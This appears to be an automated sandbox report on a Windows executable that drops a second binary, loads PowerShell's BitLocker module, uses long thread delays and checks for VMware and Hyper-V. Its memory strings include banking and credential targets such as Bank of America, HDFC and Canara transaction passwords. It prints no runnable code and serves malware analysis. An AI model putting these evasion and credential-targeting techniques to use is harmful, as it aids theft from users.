Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

File created: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_0000020933556480 ExitProcess,OpenMutexA,ExitProcess,CreateMutexA,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,

9_2_0000020933556480

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Memory allocated: 6DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Memory allocated: 7020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Memory allocated: 9020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Memory allocated: BF50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Memory allocated: 37F50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Window / User API: threadDelayed 6699	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Window / User API: threadDelayed 3248	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5867	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3938	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_9-74684

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe TID: 8060	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep count: 5867 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep count: 3938 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933599810 FindClose,FindFirstFileExW,GetLastError,	9_2_0000020933599810
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335998C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	9_2_00000209335998C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B24E8 FindFirstFileExW,	9_2_00000209335B24E8

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_00000209335613B0 GetLogicalDriveStringsW,

9_2_00000209335613B0

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_0000020933577348 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

9_2_0000020933577348

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\migration\wtr\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\	Jump to behavior

Source: HZ1BUCfTne.exe, 00000000.00000002.2395739748.000000000B4D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Qxy
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000002.1753598023.00000209319D4000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1682808508.00000209319D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: HZ1BUCfTne.exe, 00000000.00000002.2390250024.00000000051F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: sUKFphHSzX.exe, 00000009.00000003.1686723692.00000209338A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: HZ1BUCfTne.exe, 00000000.00000002.2395739748.000000000B4D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
